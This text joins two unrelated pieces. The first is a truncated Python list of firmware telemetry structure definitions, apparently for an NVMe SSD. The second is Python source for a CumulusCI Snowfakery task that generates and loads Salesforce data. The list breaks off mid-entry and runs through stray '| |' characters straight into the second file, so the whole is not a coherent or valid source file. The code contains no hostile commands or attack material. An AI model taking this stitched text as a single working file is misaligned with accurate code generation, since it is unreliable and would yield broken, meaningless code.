['mFlowCtlStatus', 'nmiFlowCtlStatus_t', 'NVME_FLOW_CTL_STATUS_VERSION_MAJOR', 'NVME_FLOW_CTL_STATUS_VERSION_MINOR', 4, None, None, None, None],
['mRunTimeSmbAddress', 'uint8_t', 'RT_SMB_ADDR_VERSION_MAJOR', 'RT_SMB_ADDR_VERSION_MINOR', 4, None, None, None, None],
['trimEntriesBuffer', 'trimBuff_t', 'TRIM_BUFF_VERSION_MAJOR', 'TRIM_BUFF_VERSION_MINOR', 4, None, None, None, None],
['mrr_log', 'Mrr_LogEntry_t', 'MRR_VERSION_MAJOR', 'MRR_VERSION_MINOR', 1, None, None, None, None],
['tcm_queues', 'tcm_queues_t', 'TCM_QUEUES_VERSION_MAJOR', 'TCM_QUEUES_VERSION_MINOR', 4, None, None, None, None],
['Stats', 'Stats_v52_t', 'STATS_VER_MAJOR', 'STATS_VER_MINOR', 4, None, None, None, None],
['WSM_Info', 'Wsm_t', 'WSM_INFO_VERSION_MAJOR', 'WSM_INFO_VERSION_MINOR', 4, None, None, None, None],
['mrr_successDistribution', 'Mrr_ReadCounts_t', 'MRR_SUCSESS_DIST_VERSION_MAJOR', 'MRR_SUCCES_DIST_VERSION_MINOR', 4, None, None, None, None],
['EnduranceMgr', 'EM_State_t', 'ENDURANCEMGR_VERSION_MAJOR', 'ENDURANCEMGR_VERSION_MINOR', 4, None, None, None, None],
['tll_cache_manager', 'tcm_t', 'TCM_VERSION_MAJOR', 'TCM_VERSION_MINOR', 4, None, None, None, None],
['ReadDisturb', 'ReadDisturb_t', 'READDISTURB_VER_MAJOR', 'READDISTURB_VER_MINOR', 4, None, None, None, None],
['buffer_targets', 'buffer_targets_t', 'BUFFER_TARGETS_VERSION_MAJOR', 'BUFFER_TARGETS_VERSION_MINOR', 4, None, None, None, None],
['backEndStats', 'backEndStats_t', 'BACKENDSTATS_VERSION_MAJOR', 'BACKENDSTATS_VERSION_MINOR', 4, None, None, None, None],
['nlogStat', 'nlogStat_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['nlogPliLogs', 'nlogPliLogs_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['nlogPoolPliLogsPtr', 'nlogPoolPliLogsPtr', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogEventCounter', 'uint64_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogPausedNlogs', 'uint64_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', None, None, None, None, None],
['nlogHostLogPtr', 'nlogPtrs_t', 'NLOG_VERSION_MAJOR', 'NLOG_VERSION_MINOR', 4, None, None, None, None],
['mrr_status', 'Mrr_Status_t', None, None, 4, None, None, None, None],
['PliRestoreState', 'PliRestoreState_t', 'PLI_RESTORE_STATE_VERSION_MAJOR', 'PLI_RESTORE_STATE_VERSION_MINOR', 4, None, None, None, None],
['XORinfo', 'xorInfo_t', 'XOR_INFO_VERSION_MAJOR', 'XOR_INFO_VERSION_MINOR', 4, None, None, None, None],
['stackCoreComplete', 'uint32_t', 'STACK_CORE_COMPLETE_VERSION_MAJOR', 'STACK_CORE_COMPLETE_VERSION_MINOR', 1, None, None, None, None],
['PliWriteStream', 'PliWriteStream_t', 'PLI_WRITE_STREAM_VERSION_MAJOR', 'PLI_WRITE_STREAM_VERSION_MINOR', 4, None, None, None, None],
['nandReadWriteWorkStack', 'nandReadWriteWorkStack_t', 'NAND_RW_WORK_STACK_VERSION_MAJOR', 'NAND_RW_WORK_STACK_VERSION_MINOR', 4, None, None, None, None],
['Xor_Hw_Info', 'xorHwInfo_t', 'XOR_HW_INFO_VERSION_MAJOR', 'XOR_HW_INFO_VERSION_MINOR', 4, None, None, None, None],
['pliSideTraceStackDump', 'pliSideTraceStackDump_t', 'PLI_SIDE_TRACE_STACK_DUMP_VERSION_MAJOR', 'PLI_SIDE_TRACE_STACK_DUMP_VERSION_MINOR', 1, None, None, None, None],
['PMIC_REGS', 'pmicRegset_t', 'PMIC_REGSET_VERSION_MAJOR', 'PMIC_REGSET_VERSION_MINOR', 4, None, None, None, None],
['nandSyncLock', 'Cpu_CpuGateLock_t', 'CPU_GATE_LOCK_VERSION_MAJOR', 'CPU_GATE_LOCK_VERSION_MINOR', 4, None, None, None, None],
['assertRecoveryGate', 'assertRecoveryGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['burninGate', 'burninGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['cpuifInitGate', 'cpuifInitGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', None, None, None, None, None],
['gate', 'Cpu_CpuGate_t', None, None, 4, None, None, None, None],
['llfEraseGate', 'llfEraseGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['nandPhyRstGate', 'nandPhyRstGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', 4, None, None, None, None],
['pliConditionalWriteCompleterGate', 'pliConditionalWriteCompleterGate', 'CPU_GATE_VERSION_MAJOR', 'CPU_GATE_VERSION_MINOR', None, None, None, None, None],
['TransIcmdReservedReuseStack', 'NPL_TRANS_ICMD_RESERVED_REUSE_STACK', 'TRNS_ICMD_RSRV_RE_STACK_VERSION_MAJOR', 'TRNS_ICMD_RSRV_RE_STACK_VERSION_MINOR', 4, None, None, None, None],
['assertGateUnlock', 'assertGateUnlock', 'GATE_UNLOCK_VERSION_MAJOR', 'GATE_UNLOCK_VERSION_MINOR', None, None, None, None, None],
['PliBandEraseState', 'PliBandEraseState_t', 'PLIBANDERASESTATE_VERSION', 'PLIBANDERASESTATE_VERSION_MINOR', 4, None, None, None, None],
['warmResetGateUnlock', 'warmResetGateUnlock', 'GATE_UNLOCK_VERSION_MAJOR', 'GATE_UNLOCK_VERSION_MINOR', None, None, None, None, None],
['pliSaveState', 'PliSaveState_t', 'PLIVAL_SAVE_STATE_VERSION_MAJOR', 'PLIVAL_SAVE_STATE_VERSION_MINOR', 4, None, None, None, None],
['dm', 'DMv5_t', 'DEFECTMAP_VERSION_MAJOR', 'DEFECTMAP_VERSION_MINOR', None, None, None, None, None],
['Xor_DebugLog', 'xorDebugLog_t', 'XOR_INFO_VERSION_MAJOR', 'XOR_INFO_VERSION_MINOR', 4, None, None, None, None],
['pCmdCtxList', 'pCmdCtxList_t', 'P_CMD_CTX_LIST_VERSION_MAJOR', 'P_CMD_CTX_LIST_VERSION_MINOR', 8, None, None, None, None],
['dmaDescMsgs', '_transDmaDesc_t', 'TRANS_DMA_DESC_VERSION_MAJOR', 'TRANS_DMA_DESC_VERSION_MINOR', 4, None, None, None, None],
['Nei', 'ERR_INJECT_t', 'ERR_INJECT_VERSION_MAJOR', 'ERR_INJECT_VERSION_MINOR', 4, None, None, None, None],
['iCmdPtrList', 'iCmdPtrList_t', 'I_CMD_PTR_LIST_VERSION_MAJOR', 'I_CMD_PTR_LIST_VERSION_MINOR', 8, None, None, None, None],
['PsrInfo', 'psrInfo_t', 'PSR_INFO_VERSION_MAJOR', 'PSR_INFO_VERSION_MINOR', 4, None, None, None, None],
['nandTrimMgrInfo', 'NandTrimMgrInfo_t', 'NAND_TRIM_MGR_INFO_VERSION_MAJOR', 'NAND_TRIM_MGR_INFO_VERSION_MINOR', 4, None, None, None, None],
['band_SeqInfo', 'Band_SequenceInfo_t', 'BAND_SEQ_INFO_VERSION_MAJOR', 'BAND_SEQ_INFO_VERSION_MINOR', 4, None, None, None, None],
['XORRecovery', 'XORRecovery_t', 'XOR_RECOVERY_VERSION_MAJOR', 'XOR_RECOVERY_VERSION_MINOR', 4, None, None, None, None],
['band_EraseInfo', 'band_EraseInfo_t', 'BAND_ERASECOUNT_VER_MAJOR', 'BAND_ERASECOUNT_VER_MINOR', 4, None, None, None, None],
['band_InvalidityInfo', 'band_InvalidityInfo_t', 'BAND_INVALIDITY_INFO_VERSION_MAJOR', 'BAND_INVALIDITY_INFO_VERSION_MINOR', 4, None, None, None, None],
['band_LinkedList', 'band_LinkedList_t', 'BAND_LINKED_LIST_VERSION_MAJOR', 'BAND_LINKED_LIST_VERSION_MINOR', 4, None, None, None, None],
['bootProfileDRAM', 'bootProfileStructure_DRAM_VER_1_t', 'MAJOR_BOOT_PROFILE_VER_FW', 'MINOR_BOOT_PROFILE_VER_FW', 4, None, None, None, None],
['runningStatus', 'XORRecovery_RunningStatus_t', 'XOR_RECOVERY_RUNNING_STATUS_VERSION_MAJOR', 'XOR_RECOVERY_RUNNING_STATUS_VERSION_MINOR', 4, None, None, None, None],
['InternalDataCmdDescPool', 'internalDataCmdDesc_t', 'INTERAL_DATA_CMD_DESC_VERSION_MAJOR', 'INTERAL_DATA_CMD_DESC_VERSION_MINOR', 4, None, None, None, None],
['band_EbCount', 'uint16_t', 'BAND_EB_COUNT_VERSION_MAJOR', 'BAND_EB_COUNT_VERSION_MINOR', 4, None, None, None, None],
['xorDebugStats', 'XORRecovery_DebugStats_t', 'XOR_RECOVERY_DEBUG_STATS_VERSION_MAJOR', 'XOR_RECOVERY_DEBUG_STATS_VERSION_MINOR', 4, None, None, None, None],
['SlowCtx', 'SlowCtx_t', 'SLOWCTX_HEADER_VER', 'SLOWCTX_HEADER_VER_MINOR', 4, None, None, None, None],
['bandPweInfo', 'band_pweInfo_t', 'BAND_PWE_INFO_VERSION_MAJOR', 'BAND_PWE_INFO_VERSION_MINOR', 4, None, None, None, None],
['PrefetchData', 'ReadPrefetch_t', 'READ_PREFETCH_VERSION_MAJOR', 'READ_PREFETCH_VERSION_MINOR', 4, None, None, None, None],
['SlowCtxDataArray', 'SlowCtxDataEntry_t', 'SLOWCTX_HEADER_VER', 'SLOWCTX_HEADER_VER_MINOR', 4, None, None, None, None],
['NandChannelRegsDump', 'ntpRegsDump_t', 'NTP_REGS_DUMP_VERSION_MAJOR', 'NTP_REGS_DUMP_VERSION_MINOR', 4, None, None, None, None],
['band_State', 'band_State_t', None, None, 4, None, None, None, None],
['nplFaultInfo', 'nplIntFaultInfo_t', 'NPL_INT_FAULT_INFO_VERSION_MAJOR', 'NPL_INT_FAULT_INFO_VERSION_MINOR', 4, None, None, None, None],
['npsRegs', 'uint32_t', 'HAL_REGISTERS_VERSION_MAJOR', 'HAL_REGISTERS_VERSION_MINOR', 4, None, None, None, None],
['dmtRegs', 'uint32_t', 'HAL_REGISTERS_VERSION_MAJOR', 'HAL_REGISTERS_VERSION_MINOR', 4, None, None, None, None],
['Replay', 'Replay_t', 'REPLAY_VERSION_MAJOR', 'REPLAY_VERSION_MINOR', None, None, None, None, None],
['band_isXorEnabled', 'uint32_t', 'BAND_BIT_ARRAY_VERSION_MAJOR', 'BAND_BIT_ARRAY_VERSION_MINOR', 1, None, None, None, None],
['InternalDataCmdDescFree', 'internalDataCmdDescFree_t', 'INTERNAL_DATA_CMD_DESC_FREE_VERSION_MAJOR', 'INTERNAL_DATA_CMD_DESC_FREE_VERSION_MINOR', 4, None, None, None, None],
['dynamicWindow', 'DynamicWindow_t', 'DW_INFO_VERSION_MAJOR', 'DW_INFO_VERSION_MINOR', 4, None, None, None, None],
['fwUpdState', 'fwUpdState_t', 'FW_UPD_STATE_VERSION_MAJOR', 'FW_UPD_STATE_VERSION_MINOR', 4, None, None, None, None],
['tbufInfo', 'TransferBufferInfo_t', 'TRANS_BUF_INFO_VERSION_MAJOR', 'TRANS_BUF_INFO_VERSION_MINOR', 4, None, None, None, None],
['capTestInfo', 'pliCapTest_t', 'PLI_CAP_TEST_VERSION_MAJOR', 'PLI_CAP_TEST_VERSION_MINOR', 4, None, None, None, None],
['CtxRestoreTime', 'ctxRestoreTime_t', 'CTX_RESTORE_TIME_VERSION_MAJOR', 'CTX_RESTORE_TIME_VERSION_MINOR', 4, None, None, None, None],
['SystemInfo', 'SystemInfo_t', 'SYSTEM_INFO_VERSION_MAJOR', 'SYSTEM_INFO_VERSION_MINOR', 4, None, None, None, None],
['mailBoxesToSave', 'nplMbToSave_t', 'NPL_MB_TO_SAVE_VERSION_MAJOR', 'NPL_MB_TO_SAVE_VERSION_MINOR', 4, None, None, None, None],
['LLF_FormatProgress', 'LLF_FormatProgress_t', None, None, 4, None, None, None, None],
['LLFFormatProgress', 'LLF_FormatProgress_t', 'LLF_FORMAT_PROGRESS_VERSION_MAJOR', 'LLF_FORMAT_PROGRESS_VERSION_MINOR', 4, None, None, None, None],
['nplMmioInfo', 'nplIntMmioInfo_t', 'NPL_INT_MMIO_INFO_VERSION_MAJOR', 'NPL_INT_MMIO_INFO_VERSION_MINOR', 4, None, None, None, None],
['channelTimeout', 'channelTimeoutInfo_t', 'CHANNEL_TIMEOUT_VERSION_MAJOR', 'CHANNEL_TIMEOUT_VERSION_MINOR', 4, None, None, None, None],
['indConfig', 'IndConfig_t', 'IND_CONFIG_VERSION_MAJOR', 'IND_CONFIG_VERSION_MINOR', 4, None, None, None, None],
['nplErrInfo', 'nplIntErrInfo_t', 'NPL_INT_ERR_INFO_VERSION_MAJOR', 'NPL_INT_ERR_INFO_VERSION_MINOR', 4, None, None, None, None],
['SafeShutdown_Info', 'SafeShutdown_Info_t', None, None, 4, None, None, None, None],
['nplCount', 'nplDebugCounts_t', 'NPL_DEBUG_COUNTS_VERSION_MAJOR', 'NPL_DEBUG_COUNTS_VERSION_MINOR', 4, None, None, None, None],
['InitStateCoreSync', 'InitStateCoreSync_t', 'INIT_STATE_CORE_SYNC_VERSION_MAJOR', 'INIT_STATE_CORE_SYNC_VERSION_MINOR', 4, None, None, None, None],
['LLF_FormatProgressHost', 'LLF_FormatProgressHost_t', None, None, 4, None, None, None, None],
['LLFFormatProgressHost', 'LLF_FormatProgressHost_t', 'LLF_FORMAT_PROGRESS_HOST_VERSION_MAJOR', 'LLF_FORMAT_PROGRESS_HOST_VERSION_MINOR', 4, None, None, None, None],
['nplCore1Info', 'nplIntCoreInfo_t', 'NPL_INT_CORE_INFO_VERSION_MAJOR', 'NPL_INT_CORE_INFO_VERSION_MINOR', 4, None, None, None, None],
['dmt_register_base', 'char*', 'DMT_REGISTER_BASE_VERSION_MAJOR', 'DMT_REGISTER_BASE_VERSION_MINOR', 4, None, None, None, None],
['nplTransInfo', 'nplIntTransInfo_t', 'NPL_INT_TRANS_INFO_VERSION_MAJOR', 'NPL_INT_TRANS_INFO_VERSION_MINOR', 4, None, None, None, None],
['PMIC', 'pmic_info_t', 'PMIC_VERSION_MAJOR', 'PMIC_VERSION_MINOR', 4, None, None, None, None],
['core1ChildMailboxItem', 'core1ChildMailboxItem', 'NPL_MB_ITEM_VERSION_MAJOR', 'NPL_MB_ITEM_VERSION_MINOR', None, None, None, None, None],
['Xor_DebugLogIndex', 'uint8_t', 'XOR_DEBUG_LOG_VERSION_MAJOR', 'XOR_DEBUG_LOG_VERSION_MINOR', 4, None, None, None, None],
['telemetry', 'telemetryDataAreaTOCHdrV2_0_t', 'TELEMETRY_VERSION_MAJOR', 'TELEMETRY_VERSION_MINOR', 4, None, None, None, None],
['PliSideTracePayload', 'pliSideTraceAssertPayload_t', 'PLI_SIDETRACE_ASSERT_PAYLOAD_MAJOR_VERSION', 'PLI_SIDETRACE_ASSERT_PAYLOAD_MINOR_VERSION', 4, None, None, None, None],
['PliSideTraceCoreData', 'PliCoreDebugTrackingData_t', 'PLI_CORE_DEBUG_TRACING_DATA_VERSION_MAJOR', 'PLI_CORE_DEBUG_TRACING_DATA_VERSION_MINOR', 1, None, None, None, None],
['pliCoreSpecificFlags', 'pliCoreSpecificFlags_t', 'PLI_CORE_SPECIFIC_FLAGS_VERSION_MAJOR', 'PLI_CORE_SPECIFIC_FLAGS_VERSION_MINOR', None, None, None, None, None],
['nvmeFeatures', 'nvmeFeatures_t', 'NVME_FEATURES_VERSION_MAJOR', 'NVME_FEATURES_VERSION_MINOR', 4, None, None, None, None],
['bridgeInfo', 'bridgeInfo_t', 'BRIDGEINFO_VERSION_MAJOR', 'BRIDGEINFO_VERSION_MINOR', 4, None, None, None, None],
['nplInfo', 'nplInfo_t', None, None, 4, None, None, None, None],
['NplSQueueState', 'nplQMgrQList_t', 'NPL_QMGR_QLIST_VERSION_MAJOR', 'NPL_QMGR_QLIST_VERSION_MINOR', 4, None, None, None, None],
['powerGov_Fconfig', 'pwgFConfig_t', 'PWG_FCONFIG_MAJOR', 'PWG_FCONFIG_MINOR', 4, None, None, None, None],
['pwgSysParam', 'pwgSysParam_t', 'PWG_SYS_PARAM_MAJOR', 'PWG_SYS_PARAM_MINOR', 4, None, None, None, None],
['powerGov_ThrottleCounters', 'PwrGov_ThrottleCounters_t', 'PWG_TC_PARAM_MAJOR', 'PWG_TC_PARAM_MINOR', 4, None, None, None, None],
['fConfigStream', 'fConfigStream_t', 'FCONFIG_STREAM_VER', 'FCONFIG_STREAM_VER_MINOR', 4, None, None, None, None],
['telemetryObjectIntelVUToc', 'telemetryObjMapEntryV2_t', None, None, 4, None, None, None, None],
['telemetryObjectBlockAlignmentPad', 'telemetryObjMapEntryV2_t', None, None, 4, None, None, None, None],
['telemetryObjectIntfHeader', 'eUniqueIdentifier', None, None, 4, None, None, None, None],
['telemetryObjectHIBlobHeader', 'eUniqueIdentifier', None, None, 4, None, None, None, None],
['_transDmaDesc', '_transDmaDesc_t', None, None, 4, None, None, None, None],
['abortedPrograms', 'pliAbortedProgram_t', None, None, 8, None, None, None, None],
['AllTaskInfoData', 'Krn_t', None, None, 4, None, None, None, None],
['AllTaskInfoData', 'Krnl_TaskInfoData_t', None, None, 3, None, None, None, None],
['band_WrittenBandData', 'band_WrittenBandData_t', None, None, 1, None, None, None, None],
['bandOpenTimeInMins', 'bandOpenTimeInMins_s', None, None, 4, None, None, None, None],
['BDR', 'BDR_t', None, None, 4, None, None, None, None],
['BDR_OpenBands', 'BDR_OpenBands_t', None, None, 4, None, None, None, None],
['bootProfileStructure_DRAM', 'bootProfileStructure_DRAM_t', None, None, 4, None, None, None, None],
['bootProfileStructure_DRAM_VER_1', 'bootProfileStructure_DRAM_VER_1_t', None, None, 4, None, None, None, None],
['CacheNandWriteBuffer', 'CacheNandWriteBuffer_t', None, None, 1, None, None, None, None],
['CacheSlotEntrySharedFields', 'CacheSlotEntrySharedFields_t', None, None, 8, None, None, None, None],
['cahceSlot', 'PliCacheSlotEntry_t', None, None, 4, None, None, None, None],
['changeDefInfo', 'changeDefInfo_t', None, None, 4, None, None, None, None],
['cmdHeader', 'cmdHeader_t', None, None, 4, None, None, None, None],
['coreStats', '_coreStats_t', 'CORE_STATS_VER_MAJOR', 'CORE_STATS_VER_MINOR', 4, None, None, None, None],
['createRegionCmdInfo', 'createRegionCmdInfo_t', None, None, 4, None, None, None, None],
['ctx', 'cmdContext_t', None, None, 4, None, None, None, None],
['CtxAutoBdgt_DrvParam', 'CtxAutoBdgt_DrvParam_t', None, None, 4, None, None, None, None],
['dataCmdInfo', 'dataCmdInfo_t', None, None, 4, None, None, None, None],
['defragHistoryExtendedElement', 'defragHistoryExtendedElement_t', None, None, 1, None, None, None, None],
['defragHistoryHeader', 'defragHistoryHeader_t', None, None, 4, None, None, None, None],
['defragHistoryLiteElement', 'defragHistoryLiteElement_t', None, None, 1, None, None, None, None],
['defragHistoryNormalElement', 'defragHistoryNormalElement_t', None, None, 1, None, None, None, None],
['defragHistoryTDElement', 'defragHistoryTDElement_t', None, None, 1, None, None, None, None],
['DefragMeritQueue', 'DefragMeritQueue_t', None, None, 4, None, None, None, None],
['DefragSlow', 'DefragSlow_t', None, None, 4, None, None, None, None],
['deleteRegionCmdInfo', 'deleteRegionCmdInfo_t', None, None, 4, None, None, None, None],
['descr', 'PliHeaderDescriptor_t', None, None, 4, None, None, None, None],
['deviceErrInjectionDword11', 'deviceErrInjectionDword11_t', None, None, 4, None, None, None, None],
['deviceSelfTestInfo', 'deviceSelfTestInfo_t', | |
import shutil
import time
import typing as T
from collections import defaultdict
from contextlib import contextmanager
from datetime import timedelta
from math import ceil
from pathlib import Path
from queue import Empty
from tempfile import TemporaryDirectory, mkdtemp
import psutil
from snowfakery.api import COUNT_REPS, infer_load_file_path
from snowfakery.cci_mapping_files.declaration_parser import (
ChannelDeclaration,
SObjectRuleDeclarationFile,
)
import cumulusci.core.exceptions as exc
from cumulusci.core.config import OrgConfig, TaskConfig
from cumulusci.core.debug import get_debug_mode
from cumulusci.core.exceptions import TaskOptionsError
from cumulusci.core.keychain import BaseProjectKeychain
from cumulusci.core.utils import (
format_duration,
process_bool_arg,
process_list_arg,
process_list_of_pairs_dict_arg,
)
from cumulusci.tasks.bulkdata.generate_and_load_data_from_yaml import (
GenerateAndLoadDataFromYaml,
)
from cumulusci.tasks.salesforce import BaseSalesforceApiTask
from .snowfakery_utils.queue_manager import (
SnowfakeryChannelManager,
data_loader_new_directory_name,
)
from .snowfakery_utils.snowfakery_run_until import PortionGenerator, determine_run_until
from .snowfakery_utils.snowfakery_working_directory import SnowfakeryWorkingDirectory
from .snowfakery_utils.subtask_configurator import SubtaskConfigurator
# A portion serves the same process in this system as a "batch" in
# other systems. The term "batch" is not used to avoid confusion with
# Salesforce Bulk API 1.0 batches. For example, a portion of 250_000
# Account records would be broken into roughly 25 Salesforce upload
# batches.
# The system starts at the MIN_PORTION_SIZE and grows towards the
# MAX_PORTION_SIZE. This is to prevent the org wasting time waiting
# for the first portions.
MIN_PORTION_SIZE = 2_000
MAX_PORTION_SIZE = 250_000
# Maximum number of failed record sets tolerated before the task aborts
# (checked in _report_status).
ERROR_THRESHOLD = (
    0  # TODO v2.1: Allow this to be a percentage of recent records instead
)
# time between "ticks" where the task re-evaluates its progress
# relatively arbitrary trade-off between busy-waiting and adding latency.
# Value is in seconds (passed to time.sleep in the _loop tick loop).
WAIT_TIME = 3
class Snowfakery(BaseSalesforceApiTask):
    # Orchestrates Snowfakery recipe execution and Salesforce data loading,
    # growing portion sizes from MIN_PORTION_SIZE toward MAX_PORTION_SIZE
    # until the configured run_until_* goal is met (see _run_task/_loop).

    # User-facing task documentation rendered by the CumulusCI framework.
    task_docs = """
    Do a data load with Snowfakery.
    All options are optional.
    The most commonly supplied options are `recipe` and one of the three
    `run_until_...` options.
    """

    # Option metadata consumed by the CumulusCI framework (names, required
    # flags and help text); the values themselves are read and normalized
    # in _validate_options().
    task_options = {
        "recipe": {
            "required": True,
            "description": "Path to a Snowfakery recipe file determining what data to generate and load.",
        },
        "run_until_records_in_org": {
            "description": """<sobject>:<count>
      Run the recipe repeatedly until the count of <sobject>
      in the org matches the given <count>.
      For example, `--run_until_records_in_org Account:50_000` means:
      Count the Account records in the org. Let’s say the number
      is 20,000. Thus, we must run the recipe over and
      over again until we generate 30,000 new Account records.
      If the recipe also generates e.g.Contacts, Opportunities or whatever
      else, it generates the appropriate number of them to match.
      Underscores are allowed but optional in big numbers: 2000000
      is the same as 2_000_000.
        """
        },
        "run_until_records_loaded": {
            "description": """<sobject>:<count>
      Run the recipe repeatedly until the number of records of
      <sobject> uploaded in this task execution matches <count>.
      For example, `--run_until_records_loaded Account:50_000` means:
      Run the recipe over and over again
      until we generate 50_000 new Account records. If the recipe
      also generates e.g. Contacts, Opportunities or whatever else, it
      generates the appropriate number of them to match.
        """
        },
        "run_until_recipe_repeated": {
            "description": """Run the recipe <count> times,
            no matter what data is already in the org.
            For example, `--run_until_recipe_repeated 50_000` means
            run the recipe 50_000 times."""
        },
        "working_directory": {"description": "Path for temporary / working files"},
        "loading_rules": {
            "description": "Path to .load.yml file containing rules to use to "
            "load the file. Defaults to `<recipename>.load.yml`. "
            "Multiple files can be comma separated."
        },
        "recipe_options": {
            "required": False,
            "description": """Pass values to override options in the format VAR1:foo,VAR2:bar
             Example: --recipe_options weight:10,color:purple""",
        },
        "bulk_mode": {
            "description": "Set to Serial to serialize everything: data generation, data loading, data ingestion through bulk API. Parallel is the default."
        },
        "drop_missing_schema": {
            "description": "Set to True to skip any missing objects or fields instead of stopping with an error."
        },
        "num_processes": {
            "description": "Number of data generating processes. Defaults to matching the number of CPUs."
        },
        "ignore_row_errors": {
            "description": "Boolean: should we continue loading even after running into row errors? "
            "Defaults to False."
        },
    }
def _validate_options(self):
"Validate options before executing the task or before freezing it"
super()._validate_options()
# Do not store recipe due to MetaDeploy options freezing
recipe = self.options.get("recipe")
recipe = Path(recipe)
if not recipe.exists():
raise exc.TaskOptionsError(f"Cannot find recipe `{recipe}`")
self.num_generator_workers = self.options.get("num_processes", None)
if self.num_generator_workers is not None:
self.num_generator_workers = int(self.num_generator_workers)
self.ignore_row_errors = process_bool_arg(
self.options.get("ignore_row_errors", False)
)
loading_rules = process_list_arg(self.options.get("loading_rules")) or []
self.loading_rules = [Path(path) for path in loading_rules if path]
self.recipe_options = process_list_of_pairs_dict_arg(
self.options.get("recipe_options") or {}
)
self.bulk_mode = self.options.get("bulk_mode", "Parallel").title()
if self.bulk_mode and self.bulk_mode not in ["Serial", "Parallel"]:
raise TaskOptionsError("bulk_mode must be either Serial or Parallel")
def _init_channel_configs(self, recipe):
"""The channels describe the 'shape' of the communication
The normal case is a single, parallelized, bulk channel,
multi-threaded on client and server, using a single user
account.
Using .load.yml you can add more channels, utilizing
more user accounts which can speed up throughput in
a few cases.
This method reads files and options to determine
what channels should be created later.
"""
channel_decls = read_channel_declarations(recipe, self.loading_rules)
if channel_decls:
self.channel_configs = channel_configs_from_decls(
channel_decls, self.project_config.keychain
)
elif self.bulk_mode == "Serial":
self.channel_configs = [
standard_channel_config(
self.org_config,
self.recipe_options,
1,
1,
)
]
else:
self.channel_configs = [
standard_channel_config(
self.org_config,
self.recipe_options,
self.num_generator_workers,
None,
)
]
def setup(self):
"""Setup for loading."""
self.debug_mode = get_debug_mode()
if not self.num_generator_workers:
# logical CPUs do not really improve performance of CPU-bound
# code, so we ignore them.
self.num_generator_workers = psutil.cpu_count(logical=False)
if self.debug_mode:
self.logger.info(f"Using {self.num_generator_workers} workers")
self.run_until = determine_run_until(self.options, self.sf)
self.start_time = time.time()
self.recipe = Path(self.options.get("recipe"))
self.sobject_counts = defaultdict(RunningTotals)
self._init_channel_configs(self.recipe)
## Todo: Consider when this process runs longer than 2 Hours,
# what will happen to my sf connection?
    def _run_task(self):
        """Task entry point: set up state, then generate and load data until
        the run_until goal is met (or there is nothing to do)."""
        self.setup()
        # Portion sizes grow from MIN_PORTION_SIZE toward MAX_PORTION_SIZE.
        portions = PortionGenerator(
            self.run_until.gap,
            MIN_PORTION_SIZE,
            MAX_PORTION_SIZE,
        )
        working_directory = self.options.get("working_directory")
        with self.workingdir_or_tempdir(working_directory) as working_directory:
            self._setup_channels_and_queues(working_directory)
            self.logger.info(f"Working directory is {working_directory}")
            # The goal may already be satisfied before generating anything.
            if self.run_until.nothing_to_do:
                self.logger.info(
                    f"Dataload is finished before it started! {self.run_until.nothing_to_do_because}"
                )
                return
            template_path, relevant_sobjects = self._generate_and_load_initial_batch(
                working_directory
            )
            # disable OrgReordCounts for now until it's reliability can be better
            # tested and documented.
            # Retrieve OrgRecordCounts code from
            # https://github.com/SFDO-Tooling/CumulusCI/commit/7d703c44b94e8b21f165e5538c2249a65da0a9eb#diff-54676811961455410c30d9c9405a8f3b9d12a6222a58db9d55580a2da3cfb870R147
            self._loop(
                template_path,
                working_directory,
                None,  # org_record_counts_thread — disabled, see note above
                portions,
            )
            self.finish()
def _setup_channels_and_queues(self, working_directory):
"""Set up all of the channels and queues.
In particular their directories and the in-memory
runtime datastructures.
Each channel can hold multiple queues.
"""
subtask_configurator = SubtaskConfigurator(
self.recipe, self.run_until, self.ignore_row_errors, self.bulk_mode
)
self.queue_manager = SnowfakeryChannelManager(
project_config=self.project_config,
logger=self.logger,
subtask_configurator=subtask_configurator,
)
if len(self.channel_configs) == 1:
channel = self.channel_configs[0]
self.queue_manager.add_channel(
org_config=channel.org_config,
num_generator_workers=channel.declaration.num_generators,
num_loader_workers=channel.declaration.num_loaders,
working_directory=working_directory,
recipe_options=channel.declaration.recipe_options,
)
else:
self.configure_multiple_channels(working_directory)
def configure_multiple_channels(self, working_directory):
"""If there is more than one channel (=user account),
pre-allocate work among them.
"""
allocated_generator_workers = sum(
(channel.declaration.num_generators or 0)
for channel in self.channel_configs
)
channels_without_workers = len(
[
channel.declaration.num_generators
for channel in self.channel_configs
if not channel.declaration.num_generators
]
)
remaining_generator_workers = (
self.num_generator_workers - allocated_generator_workers
)
num_generators_per_channel = ceil(
remaining_generator_workers / channels_without_workers
)
for idx, channel in enumerate(self.channel_configs):
if self.debug_mode:
self.logger.info("Initializing %s", channel)
channel_wd = working_directory / f"channel_{idx}"
channel_wd.mkdir()
recipe_options = channel.merge_recipe_options(self.recipe_options)
generator_workers = (
channel.declaration.num_generators or num_generators_per_channel
)
self.queue_manager.add_channel(
org_config=channel.org_config,
num_generator_workers=generator_workers,
num_loader_workers=channel.declaration.num_loaders,
working_directory=channel_wd,
recipe_options=recipe_options,
)
    def _loop(
        self,
        template_path,
        tempdir,
        org_record_counts_thread,
        portions: PortionGenerator,
    ):
        """The inner loop that controls when data is generated and when we are done.

        Each iteration "ticks" the queue manager (which may start new
        generator/loader work), refreshes running totals, sleeps WAIT_TIME
        seconds, and re-reads the upload status until `portions` reports
        that the goal is met. Returns the final upload status.
        """
        upload_status = self.get_upload_status(
            portions.next_batch_size,
        )
        while not portions.done(upload_status.total_sets_working_on_or_uploaded):
            if self.debug_mode:
                self.logger.info(f"Working Directory: {tempdir}")
            self.queue_manager.tick(
                upload_status,
                template_path,
                tempdir,
                portions,
                self.get_upload_status,
            )
